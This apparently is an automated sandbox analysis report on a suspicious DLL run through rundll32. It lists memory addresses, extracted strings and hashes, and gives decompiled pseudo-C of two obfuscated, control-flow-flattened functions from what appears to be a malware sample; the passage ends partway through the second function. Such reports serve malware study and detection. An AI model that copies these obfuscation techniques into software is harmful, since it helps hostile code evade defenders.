0x1001af4e
0x1001af4f
0x1001af52
0x00000000
0x1001adbb
0x1001adbb
0x1001adc1
0x1001aed6
0x1001aedd
0x1001aeeb
0x1001af01
0x1001af08
0x1001af0d
0x1001af12
0x1001af1a
0x00000000
0x1001adc7
0x1001adc7
0x1001adcd
0x1001aebd
0x1001aec2
0x1001aec5
0x00000000
0x1001add3
0x1001add3
0x1001add9
0x00000000
0x1001addf
0x1001addf
0x1001ade4
0x1001ae56
0x1001ae78
0x1001ae82
0x1001ae85
0x1001ae91
0x00000000
0x1001ae91
0x1001add9
0x1001adcd
0x1001adc1
0x1001adb5
0x1001ada9
0x1001ad9d
0x00000000
0x1001ad91

Strings

)?, xrefs: 1001A676
H{, xrefs: 10019E25
#oJ9, xrefs: 1001ADD3
!", xrefs: 1001A984
.v, xrefs: 10019F5A
d/<, xrefs: 1001AC44
d/<, xrefs: 1001AA53
2b, xrefs: 10019EDA
15, xrefs: 1001A054
%, xrefs: 1001A6A7
/, xrefs: 1001A3B7
;d, xrefs: 1001A1BD
}G, xrefs: 1001A911
b-, xrefs: 1001A53E
, xrefs: 10019F74
l8, xrefs: 1001A0E4
dg, xrefs: 1001A491
8, xrefs: 1001A36D
}&, xrefs: 1001A3DE
m, xrefs: 1001A07A
De, xrefs: 1001A841
"s, xrefs: 1001A38E
DM, xrefs: 1001A5B1
}, xrefs: 1001A514

Memory Dump Source

Source File: 00000007.00000002.2098137627.0000000010000000.00000040.00000001.sdmp, Offset: 10000000, based on PE: true

Associated: 00000007.00000002.2098148687.0000000010021000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.2098154346.0000000010023000.00000040.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_10000000_rundll32.jbxd

Yara matches

Similarity

API ID:
String ID: /$ $!"$"s$#oJ9$)?$.v$15$2b$8$;d$DM$De$H{$b-$d/<$d/<$dg$l8$m$}&$}G$}$%
API String ID: 0-2457962065
Opcode ID: b8df35f1196089bd07a24ea1b598622fca57a06b5ac65ee51d509657330a990c
Instruction ID: 976f8a73325060f499c1b6153de22724aa2fccf811286313bd7587404af29fef
Opcode Fuzzy Hash: b8df35f1196089bd07a24ea1b598622fca57a06b5ac65ee51d509657330a990c
Instruction Fuzzy Hash: 6292F2715093818FE378CF61C989B9BBBE1FBC5744F10891DE18A8A260D7B59989CF43

Uniqueness

Uniqueness Score: -1.00%

Function 10012965, Relevance: 26.8, Strings: 21, Instructions: 559
COMMONCrypto

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 94%

			E10012965(intOrPtr __ecx, signed int __edx) {
				char _v524;
				char _v1044;
				char _v1564;
				intOrPtr _v1568;
				intOrPtr _v1572;
				signed int _v1576;
				intOrPtr _v1580;
				char _v1584;
				intOrPtr _v1588;
				signed int _v1592;
				signed int _v1596;
				signed int _v1600;
				signed int _v1604;
				signed int _v1608;
				signed int _v1612;
				signed int _v1616;
				signed int _v1620;
				signed int _v1624;
				signed int _v1628;
				signed int _v1632;
				signed int _v1636;
				signed int _v1640;
				signed int _v1644;
				signed int _v1648;
				signed int _v1652;
				signed int _v1656;
				signed int _v1660;
				signed int _v1664;
				signed int _v1668;
				signed int _v1672;
				signed int _v1676;
				signed int _v1680;
				signed int _v1684;
				signed int _v1688;
				signed int _v1692;
				signed int _v1696;
				signed int _v1700;
				signed int _v1704;
				signed int _v1708;
				signed int _v1712;
				signed int _v1716;
				signed int _v1720;
				signed int _v1724;
				signed int _v1728;
				signed int _v1732;
				signed int _v1736;
				signed int _v1740;
				signed int _v1744;
				signed int _v1748;
				signed int _v1752;
				signed int _v1756;
				signed int _v1760;
				signed int _v1764;
				signed int _v1768;
				signed int _v1772;
				signed int _v1776;
				signed int _v1780;
				signed int _v1784;
				signed int _v1788;
				signed int _v1792;
				signed int _v1796;
				signed int _v1800;
				signed int _v1804;
				signed int _v1808;
				signed int _v1812;
				signed int _v1816;
				signed int _v1820;
				signed int _v1824;
				void* _t616;
				void* _t617;
				signed int _t631;
				signed int _t636;
				signed int _t638;
				signed int _t643;
				signed int _t653;
				signed int _t654;
				signed int _t655;
				signed int _t656;
				signed int _t657;
				signed int _t658;
				signed int _t659;
				signed int _t660;
				signed int _t661;
				signed int _t662;
				signed int _t663;
				signed int _t664;
				signed int _t665;
				signed int _t675;
				void* _t676;
				void* _t681;
				signed int _t731;
				signed int _t732;
				signed int _t733;
				signed int _t734;
				signed int _t737;
				void* _t739;
				void* _t740;
				void* _t742;

				_v1592 = __edx;
				_v1588 = __ecx;
				_v1600 = 0x81a2;
				_v1600 = _v1600 * 0x51;
				_t734 = 0x149dffe6;
				_v1600 = _v1600 ^ 0x0029046b;
				_v1820 = 0xa317;
				_t731 = 0x6d;
				_v1820 = _v1820 / _t731;
				_v1820 = _v1820 | 0xb0bf28c0;
				_v1820 = _v1820 << 8;
				_v1820 = _v1820 ^ 0xbf29f1c0;
				_v1644 = 0x87c;
				_v1644 = _v1644 << 4;
				_v1644 = _v1644 ^ 0x00008950;
				_v1656 = 0xaf72;
				_v1656 = _v1656 ^ 0xf8536856;
				_v1656 = _v1656 ^ 0xf853f78b;
				_v1720 = 0x2378;
				_t653 = 0x12;
				_v1720 = _v1720 * 0x77;
				_v1720 = _v1720 ^ 0x64312f2b;
				_v1720 = _v1720 ^ 0x642133c7;
				_v1804 = 0xea19;
				_v1804 = _v1804 + 0xffff5808;
				_v1804 = _v1804 << 0x10;
				_v1804 = _v1804 * 0x6f;
				_v1804 = _v1804 ^ 0xac4f53f6;
				_v1748 = 0x9778;
				_v1748 = _v1748 << 7;
				_v1748 = _v1748 ^ 0x598ba3f9;
				_v1748 = _v1748 + 0x8ff6;
				_v1748 = _v1748 ^ 0x59c0ab27;
				_v1664 = 0x881f;
				_v1664 = _v1664 >> 0xa;
				_v1664 = _v1664 | 0x5b999195;
				_v1664 = _v1664 ^ 0x5b999b93;
				_v1728 = 0x74b1;
				_v1728 = _v1728 ^ 0x6074f824;
				_v1728 = _v1728 >> 0xd;
				_v1728 = _v1728 ^ 0x00031884;
				_v1628 = 0x3039;
				_v1628 = _v1628 / _t653;
				_v1628 = _v1628 ^ 0x00006384;
				_v1736 = 0xc64f;
				_t654 = 0x5c;
				_v1736 = _v1736 / _t654;
				_v1736 = _v1736 | 0xd5a0b868;
				_v1736 = _v1736 ^ 0xd5a0f550;
				_v1724 = 0xb856;
				_v1724 = _v1724 + 0x47b5;
				_v1724 = _v1724 * 0x2a;
				_v1724 = _v1724 ^ 0x002a3a18;
				_v1824 = 0x8351;
				_v1824 = _v1824 + 0x81f5;
				_v1824 = _v1824 + 0xe517;
				_v1824 = _v1824 << 2;
				_v1824 = _v1824 ^ 0x0007a51f;
				_v1740 = 0xf66b;
				_v1740 = _v1740 + 0xffff1308;
				_v1740 = _v1740 << 6;
				_v1740 = _v1740 ^ 0x0002750a;
				_v1792 = 0x9fd9;
				_v1792 = _v1792 + 0x4b8e;
				_v1792 = _v1792 + 0xffff2f9e;
				_v1792 = _v1792 >> 0xf;
				_v1792 = _v1792 ^ 0x00003a08;
				_v1800 = 0x966c;
				_v1800 = _v1800 ^ 0x8d45c2e0;
				_v1800 = _v1800 ^ 0x65a85158;
				_v1800 = _v1800 + 0xffff603c;
				_v1800 = _v1800 ^ 0xe8ec61cf;
				_v1716 = 0x4029;
				_t655 = 0x60;
				_v1716 = _v1716 / _t655;
				_v1716 = _v1716 ^ 0x86a261cb;
				_v1716 = _v1716 ^ 0x86a2059f;
				_v1808 = 0xe8e3;
				_v1808 = _v1808 / _t731;
				_v1808 = _v1808 + 0x483f;
				_v1808 = _v1808 ^ 0xbcef0a4e;
				_v1808 = _v1808 ^ 0xbcef6349;
				_v1816 = 0x6f91;
				_v1816 = _v1816 + 0xffff8468;
				_t732 = 0x34;
				_t656 = 0x29;
				_v1816 = _v1816 * 0x33;
				_v1816 = _v1816 << 7;
				_v1816 = _v1816 ^ 0xfecd495c;
				_v1640 = 0xa61;
				_v1640 = _v1640 >> 0xd;
				_v1640 = _v1640 ^ 0x00004d64;
				_v1648 = 0x609b;
				_v1648 = _v1648 + 0xae34;
				_v1648 = _v1648 ^ 0x00012005;
				_v1616 = 0x313f;
				_v1616 = _v1616 + 0xf40e;
				_v1616 = _v1616 ^ 0x0001621e;
				_v1680 = 0xad27;
				_v1680 = _v1680 ^ 0x11741994;
				_v1680 = _v1680 ^ 0x828bebc7;
				_v1680 = _v1680 ^ 0x93ff4a0d;
				_v1704 = 0x2eca;
				_v1704 = _v1704 << 3;
				_v1704 = _v1704 + 0xffff4fca;
				_v1704 = _v1704 ^ 0x0000afdc;
				_v1672 = 0xb5e9;
				_v1672 = _v1672 / _t732;
				_v1672 = _v1672 | 0x3cbbe239;
				_v1672 = _v1672 ^ 0x3cbbda4d;
				_v1760 = 0x653d;
				_v1760 = _v1760 ^ 0x5e29d2db;
				_v1760 = _v1760 / _t656;
				_v1760 = _v1760 * 0x30;
				_v1760 = _v1760 ^ 0x6e3d0fd3;
				_v1768 = 0xee4d;
				_v1768 = _v1768 + 0xffff4943;
				_v1768 = _v1768 * 0x23;
				_v1768 = _v1768 | 0x6650922d;
				_v1768 = _v1768 ^ 0x6657f47d;
				_v1620 = 0x4442;
				_v1620 = _v1620 << 0xa;
				_v1620 = _v1620 ^ 0x01114709;
				_v1752 = 0x70f3;
				_v1752 = _v1752 + 0xc573;
				_v1752 = _v1752 ^ 0x8bd692b9;
				_v1752 = _v1752 + 0x375f;
				_v1752 = _v1752 ^ 0x8bd7cab9;
				_v1692 = 0x8d49;
				_v1692 = _v1692 | 0xadf95343;
				_t657 = 0x6f;
				_v1692 = _v1692 / _t657;
				_v1692 = _v1692 ^ 0x01915aad;
				_v1608 = 0x9445;
				_v1608 = _v1608 ^ 0xfa8556cd;
				_v1608 = _v1608 ^ 0xfa8587ad;
				_v1596 = 0xa356;
				_v1596 = _v1596 ^ 0x020e3d0f;
				_v1596 = _v1596 ^ 0x020eaa39;
				_v1668 = 0x9fc9;
				_v1668 = _v1668 << 1;
				_v1668 = _v1668 + 0xffff5705;
				_v1668 = _v1668 ^ 0x0000873c;
				_v1676 = 0x5aa4;
				_t658 = 0x57;
				_v1676 = _v1676 * 0xd;
				_t659 = 0x74;
				_v1676 = _v1676 / _t658;
				_v1676 = _v1676 ^ 0x000044cc;
				_v1684 = 0x6a20;
				_v1684 = _v1684 << 5;
				_v1684 = _v1684 + 0xffff5b62;
				_v1684 = _v1684 ^ 0x000ca81d;
				_v1652 = 0xc97c;
				_v1652 = _v1652 >> 5;
				_v1652 = _v1652 ^ 0x00002e12;
				_v1696 = 0x481c;
				_v1696 = _v1696 << 5;
				_v1696 = _v1696 << 0xf;
				_v1696 = _v1696 ^ 0x81c0713e;
				_v1732 = 0x6e12;
				_v1732 = _v1732 + 0x239d;
				_v1732 = _v1732 << 0xe;
				_v1732 = _v1732 ^ 0x246bc9a9;
				_v1812 = 0x8d84;
				_v1812 = _v1812 << 7;
				_v1812 = _v1812 ^ 0x627ea561;
				_v1812 = _v1812 + 0xffffb69b;
				_v1812 = _v1812 ^ 0x623827c0;
				_v1612 = 0x2459;
				_v1612 = _v1612 * 0x5f;
				_v1612 = _v1612 ^ 0x000d4756;
				_v1780 = 0x3738;
				_v1780 = _v1780 >> 0xf;
				_v1780 = _v1780 + 0x7756;
				_t660 = 0x49;
				_v1780 = _v1780 / _t659;
				_v1780 = _v1780 ^ 0x00004d7c;
				_v1604 = 0xa6e8;
				_v1604 = _v1604 >> 0xb;
				_v1604 = _v1604 ^ 0x00007121;
				_v1700 = 0x3aaa;
				_v1700 = _v1700 * 0x35;
				_v1700 = _v1700 | 0x9258fa78;
				_v1700 = _v1700 ^ 0x925ce803;
				_v1776 = 0xc1a7;
				_v1776 = _v1776 | 0xe727275b;
				_t347 =  &_v1776; // 0xe727275b
				_v1776 =  *_t347 / _t660;
				_v1776 = _v1776 | 0x34b38de4;
				_v1776 = _v1776 ^ 0x37bb8fe4;
				_v1784 = 0x91c3;
				_t661 = 0x64;
				_v1784 = _v1784 / _t661;
				_v1784 = _v1784 + 0x788e;
				_v1784 = _v1784 / _t732;
				_v1784 = _v1784 ^ 0x000026f9;
				_v1756 = 0xe29b;
				_v1756 = _v1756 << 5;
				_v1756 = _v1756 >> 9;
				_t662 = 0x21;
				_v1756 = _v1756 / _t662;
				_v1756 = _v1756 ^ 0x00004ef7;
				_v1796 = 0x179;
				_v1796 = _v1796 + 0x7a5c;
				_v1796 = _v1796 | 0xddf9ffa6;
				_v1796 = _v1796 ^ 0xddf99719;
				_v1688 = 0xa45d;
				_t663 = 0x17;
				_v1688 = _v1688 / _t663;
				_v1688 = _v1688 ^ 0xa9b19ce5;
				_v1688 = _v1688 ^ 0xa9b19a72;
				_v1772 = 0x6fb4;
				_v1772 = _v1772 << 9;
				_v1772 = _v1772 >> 0xb;
				_v1772 = _v1772 >> 4;
				_v1772 = _v1772 ^ 0x0000531d;
				_v1636 = 0x1eab;
				_v1636 = _v1636 | 0x295ec68a;
				_v1636 = _v1636 ^ 0x295ec908;
				_v1712 = 0x5da6;
				_v1712 = _v1712 ^ 0x5fdaae01;
				_v1712 = _v1712 ^ 0xdf7664b8;
				_v1712 = _v1712 ^ 0x80ac9034;
				_v1764 = 0x8aec;
				_t664 = 0x4b;
				_v1764 = _v1764 / _t664;
				_t665 = 0x45;
				_v1764 = _v1764 * 0x5a;
				_v1764 = _v1764 * 0x7e;
				_v1764 = _v1764 ^ 0x0052267c;
				_v1788 = 0x22ed;
				_v1788 = _v1788 + 0xffffcd0d;
				_v1788 = _v1788 * 0x72;
				_v1788 = _v1788 << 0xc;
				_v1788 = _v1788 ^ 0x8dd516dd;
				_v1744 = 0x24eb;
				_v1744 = _v1744 ^ 0x0b5c0f43;
				_v1744 = _v1744 ^ 0xa1a0b70d;
				_v1744 = _v1744 / _t665;
				_v1744 = _v1744 ^ 0x027a3009;
				_v1624 = 0x7660;
				_v1624 = _v1624 ^ 0x00000e09;
				_v1632 = 0x758c;
				_v1632 = _v1632 << 0xa;
				_v1632 = _v1632 ^ 0x01d672ff;
				_v1660 = 0x7b50;
				_v1660 = _v1660 >> 1;
				_v1660 = _v1660 >> 3;
				_v1660 = _v1660 ^ 0x000037ef;
				_v1708 = 0x99fa;
				_v1708 = _v1708 ^ 0xe57d132d;
				_v1708 = _v1708 ^ 0x77fb962a;
				_v1708 = _v1708 ^ 0x92961cfd;
				_t616 = E100145F8();
				_t733 = _v1592;
				_t739 = _t616;
				_t651 = _v1592;
				while(1) {
					L1:
					_t617 = 0x2cd60113;
					do {
						while(1) {
							L2:
							_t742 = _t734 - 0x1e5e78f1;
							if(_t742 > 0) {
								break;
							}
							if(_t742 == 0) {
								_t636 = E1000D0DE(_v1584, _v1616, _v1680, _v1704, _v1672, _v1580);
								_t651 = _t636;
								_t740 = _t740 + 0x10;
								__eflags = _t636;
								_t617 = 0x2cd60113;
								_t734 =  !=  ? 0x2cd60113 : 0x12daf843;
								continue;
							}
							if(_t734 == 0x178ada5) {
								 *((intOrPtr*)(_t733 + 0x20)) = _v1588;
								_t638 =  *0x10021400; // 0x0
								 *(_t733 + 0x10) = _t638;
								 *0x10021400 = _t733;
								return _t638;
							}
							if(_t734 == 0x2a95541) {
								_t675 = _v1576;
								E100078F0(_t675, _v1636, _v1712, _v1764, _v1788);
								_t740 = _t740 + 0xc;
								_t734 = 0x178ada5;
								while(1) {
									L1:
									_t617 = 0x2cd60113;
									goto L2;
								}
							}
							if(_t734 == 0x12daf843) {
								_t675 = _v1756;
								E100091CD(_t675, _v1796, _v1688, _v1584, _v1772);
								_t740 = _t740 + 0xc;
								_t734 = 0x2a95541;
								while(1) {
									L1:
									_t617 = 0x2cd60113;
									goto L2;
								}
							}
							if(_t734 != 0x149dffe6) {
								if(_t734 == 0x178c8cba) {
									_push( &_v1044);
									E10002628(_v1588, _v1592);
									asm("sbb esi, esi");
									_t675 = 0x100012f8;
									_t737 = _t734 & 0x16fb7084;
									__eflags = _t737;
									L12:
									_t734 = _t737 + 0x22b4e350;
									while(1) {
										L1:
										_t617 = 0x2cd60113;
										goto L2;
									}
								} else {
									_t748 = _t734 - 0x1a9938f9;
									if(_t734 != 0x1a9938f9) {
										goto L28;
									} else {
										_push(_v1780);
										_push(1);
										_push( &_v524);
										_push(_t675);
										_push(_v1612);
										_push(_v1812);
										_t675 = _v1696;
										_push(0);
										_push(0);
										E100189F6(_t675, _v1732, _t748);
										_t740 = _t740 + 0x20;
										_t734 = 0x32f46056;
										while(1) {
											L1:
											_t617 = 0x2cd60113;
											goto L2;
										}
									}
								}
							}
							_t676 = 0x24;
							_t643 = E100157E8(_t676);
							_t733 = _t643;
							_t675 = _t675;
							__eflags = _t733;
							if(_t733 != 0) {
								_push(_t675);
								E10001D54(_v1720, _t675, _v1804, _v1748, _v1664,  &_v1564, _v1728, _v1600);
								_t740 = _t740 + 0x20;
								_t734 = 0x178c8cba;
								while(1) {
									L1:
									_t617 = 0x2cd60113;
									goto L2;
								}
							}
							return _t643;
							L32:
						}
						__eflags = _t734 - 0x22b4e350;
						if(_t734 == 0x22b4e350) {
							E100091CD(_v1744, _v1624, _v1632, _t733, _v1660);
							_t740 = _t740 + 0xc;
							_t734 = 0xf568d32;
							_t617 = 0x2cd60113;
							goto L28;
						} else {
							__eflags = _t734 - 0x23197851;
							if(_t734 == 0x23197851) {
								E10011B71( &_v1576, _v1640,  &_v1584, _v1648);
								asm("sbb esi, esi");
								_t734 = (_t734 & 0x1bb523b0) + 0x2a95541;
								goto L1;
							} else {
								__eflags = _t734 - _t617;
								if(__eflags == 0) {
									_push(0x100013a8);
									_push(_v1620);
									E100164EC(_t651, __eflags, E1001BF25(_v1760, _v1768, __eflags), _v1752, 0x104,  &_v1044,  &_v1564, _v1692, _v1608, _v1596);
									E1001C5F7(_v1668, _v1676, _v1684, _v1652, _t622);
									_t740 = _t740 + 0x34;
									_t734 = 0x1a9938f9;
									while(1) {
										L1:
										_t617 = 0x2cd60113;
										goto L2;
									}
								} else {
									__eflags = _t734 - 0x32f46056;
									if(_t734 == 0x32f46056) {
										E100091CD(_v1604, _v1700, _v1776, _t651, _v1784);
										_t740 = _t740 + 0xc;
										_t734 = 0x12daf843;
										while(1) {
											L1:
											_t617 = 0x2cd60113;
											goto L2;
										}
									} else {
										__eflags = _t734 - 0x39b053d4;
										if(_t734 != 0x39b053d4) {
											goto L28;
										} else {
											_v1572 = E10009295();
											_t631 = E1001BBAB(_v1724, _v1824, _t630, _v1740);
											_pop(_t681);
											_v1568 = 2 + _t631 * 2;
											_t675 = _v1792;
											E1001C353(_t675, _v1708, _v1800, _t739,  &_v1576, _t681, _v1716, _t681, _t739, _t739, _v1808, _v1816);
											_t740 = _t740 + 0x28;
											asm("sbb esi, esi");
											_t737 = _t734 & 0x00649501;
											goto L12;
										}
									}
								}
							}
						}
						goto L32;
						L28:
						__eflags = _t734 - 0xf568d32;
					} while (__eflags != 0);
					return _t617;
				}
			}

0x1001296f
0x10012976
0x1001297d
0x10012990
0x10012997
0x1001299c
0x100129a7
0x100129b7
0x100129bc
0x100129c2
0x100129ca
0x100129cf
0x100129d7
0x100129e2
0x100129ea
0x100129f5
0x10012a00
0x10012a0b
0x10012a16
0x10012a29
0x10012a2c
0x10012a33
0x10012a3e
0x10012a49
0x10012a51
0x10012a59
0x10012a63
0x10012a67
0x10012a6f
0x10012a77
0x10012a7c
0x10012a84
0x10012a8c
0x10012a94
0x10012a9f
0x10012aa7
0x10012ab2
0x10012abd
0x10012ac5
0x10012acd
0x10012ad2
0x10012ada
0x10012af0
0x10012af7
0x10012b02
0x10012b0e
0x10012b11
0x10012b15
0x10012b1d
0x10012b25
0x10012b2d
0x10012b3a
0x10012b3e
0x10012b46
0x10012b4e
0x10012b56
0x10012b5e
0x10012b63
0x10012b6b
0x10012b73
0x10012b7b
0x10012b80
0x10012b8a
0x10012b92
0x10012b9a
0x10012ba2
0x10012ba7
0x10012baf
0x10012bb7
0x10012bbf
0x10012bc7
0x10012bcf
0x10012bd7
0x10012beb
0x10012bf0
0x10012bf7
0x10012c02
0x10012c0d
0x10012c1d
0x10012c23
0x10012c2b
0x10012c33
0x10012c3b
0x10012c43
0x10012c50
0x10012c53
0x10012c54
0x10012c58
0x10012c5d
0x10012c65
0x10012c70
0x10012c78
0x10012c83
0x10012c8e
0x10012c99
0x10012ca4
0x10012caf
0x10012cba
0x10012cc5
0x10012cd0
0x10012cdb
0x10012ce6
0x10012cf1
0x10012cfc
0x10012d04
0x10012d0f
0x10012d1a
0x10012d30
0x10012d37
0x10012d42
0x10012d4d
0x10012d55
0x10012d63
0x10012d6c
0x10012d70
0x10012d78
0x10012d80
0x10012d8d
0x10012d91
0x10012d99
0x10012da1
0x10012dac
0x10012db4
0x10012dbf
0x10012dc7
0x10012dd1
0x10012dd9
0x10012de1
0x10012de9
0x10012df4
0x10012e08
0x10012e0d
0x10012e16
0x10012e21
0x10012e2c
0x10012e37
0x10012e42
0x10012e4d
0x10012e58
0x10012e63
0x10012e6e
0x10012e75
0x10012e80
0x10012e8b
0x10012e9e
0x10012ea1
0x10012eb1
0x10012eb2
0x10012ebb
0x10012ec6
0x10012ed1
0x10012ed9
0x10012ee4
0x10012eef
0x10012efa
0x10012f02
0x10012f0d
0x10012f18
0x10012f20
0x10012f28
0x10012f33
0x10012f3b
0x10012f43
0x10012f48
0x10012f50
0x10012f58
0x10012f5d
0x10012f65
0x10012f6d
0x10012f75
0x10012f8a
0x10012f91
0x10012f9c
0x10012fa4
0x10012fa9
0x10012fb7
0x10012fb8
0x10012fbc
0x10012fc4
0x10012fcf
0x10012fd7
0x10012fe2
0x10012ff5
0x10012ffc
0x10013007
0x10013012
0x1001301a
0x10013024
0x1001302c
0x10013030
0x10013038
0x10013040
0x1001304e
0x10013053
0x10013057
0x10013067
0x1001306d
0x10013075
0x1001307d
0x10013082
0x1001308b
0x10013090
0x10013096
0x1001309e
0x100130a6
0x100130ae
0x100130b6
0x100130be
0x100130d0
0x100130d5
0x100130de
0x100130e9
0x100130f4
0x100130fc
0x10013101
0x10013106
0x1001310b
0x10013113
0x1001311e
0x10013129
0x10013134
0x1001313f
0x1001314a
0x10013155
0x10013160
0x1001316c
0x10013171
0x1001317c
0x1001317d
0x10013186
0x1001318a
0x10013192
0x1001319a
0x100131a7
0x100131ab
0x100131b0
0x100131b8
0x100131c0
0x100131c8
0x100131d6
0x100131da
0x100131e2
0x100131fb
0x10013206
0x10013211
0x10013219
0x10013224
0x1001322f
0x10013236
0x1001323e
0x10013249
0x10013254
0x1001325f
0x1001326a
0x10013279
0x1001327e
0x10013285
0x10013287
0x1001328e
0x1001328e
0x1001328e
0x10013293
0x10013293
0x10013293
0x10013293
0x10013299
0x00000000
0x00000000
0x1001329f
0x10013442
0x10013447
0x10013449
0x1001344c
0x10013453
0x10013458
0x00000000
0x10013458
0x100132ab
0x1001363d
0x10013640
0x10013645
0x10013648
0x00000000
0x10013648
0x100132b7
0x100133ff
0x10013406
0x1001340b
0x1001340e
0x1001328e
0x1001328e
0x1001328e
0x00000000
0x1001328e
0x1001328e
0x100132c3
0x100133d3
0x100133d7
0x100133dc
0x100133df
0x1001328e
0x1001328e
0x1001328e
0x00000000
0x1001328e
0x1001328e
0x100132cf
0x100132db
0x1001333c
0x10013342
0x1001334a
0x1001334c
0x1001334d
0x1001334d
0x10013353
0x10013353
0x1001328e
0x1001328e
0x1001328e
0x00000000
0x1001328e
0x100132dd
0x100132dd
0x100132e3
0x00000000
0x100132e9
0x100132e9
0x100132f4
0x100132f6
0x100132f7
0x100132f8
0x100132ff
0x1001330a
0x10013311
0x10013313
0x10013315
0x1001331a
0x1001331d
0x1001328e
0x1001328e
0x1001328e
0x00000000
0x1001328e
0x1001328e
0x100132e3
0x100132db
0x1001336f
0x10013370
0x10013375
0x10013377
0x10013378
0x1001337a
0x10013380
0x100133ab
0x100133b0
0x100133b3
0x1001328e
0x1001328e
0x1001328e
0x00000000
0x1001328e
0x1001328e
0x10013658
0x00000000
0x10013658
0x10013460
0x10013466
0x10013616
0x1001361b
0x1001361e
0x10013623
0x00000000
0x1001346c
0x1001346c
0x10013472
0x100135e0
0x100135e8
0x100135f1
0x00000000
0x10013478
0x10013478
0x1001347a
0x1001353c
0x10013541
0x1001358f
0x100135b1
0x100135b6
0x100135b9
0x1001328e
0x1001328e
0x1001328e
0x00000000
0x1001328e
0x10013480
0x10013480
0x10013486
0x1001352a
0x1001352f
0x10013532
0x1001328e
0x1001328e
0x1001328e
0x00000000
0x1001328e
0x1001348c
0x1001348c
0x10013492
0x00000000
0x10013498
0x100134b5
0x100134bc
0x100134c2
0x100134d2
0x100134f8
0x100134fc
0x10013501
0x10013506
0x10013508
0x00000000
0x10013508
0x10013492
0x10013486
0x1001347a
0x10013472
0x00000000
0x10013628
0x10013628
0x10013628
0x00000000
0x10013293

Strings

?H, xrefs: 10012C23
['', xrefs: 10013024
", xrefs: 10013192
dM, xrefs: 10012C78
7, xrefs: 1001323E
M, xrefs: 10012D78
|&R, xrefs: 1001318A
j, xrefs: 10012EC6
$, xrefs: 100131B8
=e, xrefs: 10012D4D
+/1d, xrefs: 10012A33
BD, xrefs: 10012DA1
\z, xrefs: 100130A6
?1, xrefs: 10012CA4
)@, xrefs: 10012BD7
`v, xrefs: 100131E2
_7, xrefs: 10012DD9
VG, xrefs: 10012F91
|M, xrefs: 10012FBC
Y$, xrefs: 10012F75
!q, xrefs: 10012FD7

Memory Dump Source

Source File: 00000007.00000002.2098137627.0000000010000000.00000040.00000001.sdmp, Offset: 10000000, based on PE: true

Associated: 00000007.00000002.2098148687.0000000010021000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.2098154346.0000000010023000.00000040.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_10000000_rundll32.jbxd

Yara matches

Similarity

API ID: FolderPath
String ID: j$!q$)@$+/1d$=e$?1$?H$BD$M$VG$Y$$[''$\z$_7$`v$dM$|&R$|M$"$$$7
API String ID: 1514166925-3565163747
Opcode ID: 9163a8007b0dceb48b04801531080e3a121e2b3b0e415cdbf67a5b480fcb8054
Instruction ID: 2b517cf3c11194d57aa6f79e2f665a47e465c6b4f990833d55609906dbc9d50d
Opcode Fuzzy Hash: 9163a8007b0dceb48b04801531080e3a121e2b3b0e415cdbf67a5b480fcb8054
Instruction Fuzzy Hash: 57520F715083818FE3B8CF61C54AB8BBBE1BBC4704F10891DE5D98A2A0D7B59949CF53

Uniqueness

Uniqueness Score: -1.00%

Function 10004EA1, Relevance: 24.1, Strings: 19, Instructions: 375
COMMONCrypto

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 81%

			E10004EA1(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, signed int _a24) {
				char _v524;
				char _v1044;
				short _v1588;
				short _v1590;
				char _v1592;
				signed int _v1636;
				signed int _v1640;
				intOrPtr _v1644;
				signed int _v1648;
				signed int _v1652;
				signed int _v1656;
				signed int _v1660;
				signed int _v1664;
				signed int _v1668;
				signed int _v1672;
				signed int _v1676;
				signed int _v1680;
				signed int _v1684;
				signed int _v1688;
				signed int _v1692;
				signed int _v1696;
				signed int _v1700;
				signed int _v1704;
				signed int _v1708;
				signed int _v1712;
				signed int _v1716;
				signed int _v1720;
				signed int _v1724;
				signed int _v1728;
				signed int _v1732;
				signed int _v1736;
				signed int _v1740;
				signed int _v1744;
				signed int _v1748;
				signed int _v1752;
				signed int _v1756;
				signed int _v1760;
				signed int _v1764;
				signed int _v1768;
				signed int _v1772;
				signed int _v1776;
				signed int _v1780;
				signed int _v1784;
				signed int _v1788;
				signed int _v1792;
				signed int _v1796;
				signed int _v1800;
				void* _t372;
				signed int _t400;
				signed int _t403;
				void* _t404;
				signed int _t407;
				void* _t410;
				void* _t416;
				signed int _t420;
				void* _t423;
				void* _t429;
				void* _t457;
				signed int _t468;
				signed int _t470;
				signed int _t471;
				signed int _t472;
				signed int _t473;
				signed int _t474;
				signed int _t475;
				signed int _t476;
				signed int _t477;
				void* _t480;
				signed int* _t482;

				_push(_a24);
				_t480 = __ecx;
				_push(_a20);
				_push(_a16);
				_push(_a12);
				_push(_a8);
				_push(_a4);
				_push(__edx);
				_push(__ecx);
				E100056B2(_t372);
				_v1640 = _v1640 & 0x00000000;
				_t482 =  &(( &_v1800)[8]);
				_v1644 = 0x4bd480;
				_v1780 = 0x9933;
				_t416 = 0x363f5361;
				_v1780 = _v1780 | 0xad73ff37;
				_v1780 = _v1780 ^ 0x960b9a74;
				_v1780 = _v1780 ^ 0x3b786553;
				_v1784 = 0x542f;
				_v1784 = _v1784 + 0xc8ce;
				_v1784 = _v1784 + 0xffffa8c2;
				_t468 = 0x5b;
				_v1784 = _v1784 / _t468;
				_v1784 = _v1784 ^ 0x00004f1f;
				_v1760 = 0xa937;
				_v1760 = _v1760 + 0xc6be;
				_v1760 = _v1760 | 0x9e8a2caa;
				_v1760 = _v1760 + 0xffff9fa2;
				_v1760 = _v1760 ^ 0x9e8b35b0;
				_v1792 = 0xa290;
				_t470 = 0x63;
				_v1792 = _v1792 * 0x38;
				_v1792 = _v1792 + 0xffff655b;
				_v1792 = _v1792 + 0xffff3f9a;
				_v1792 = _v1792 ^ 0x00223804;
				_v1740 = 0x49e2;
				_v1740 = _v1740 >> 8;
				_v1740 = _v1740 | 0xc414d990;
				_v1740 = _v1740 ^ 0xc41493fb;
				_v1800 = 0x74d9;
				_t471 = 0x17;
				_v1800 = _v1800 / _t470;
				_v1800 = _v1800 ^ 0xc291bda4;
				_v1800 = _v1800 + 0xeb6d;
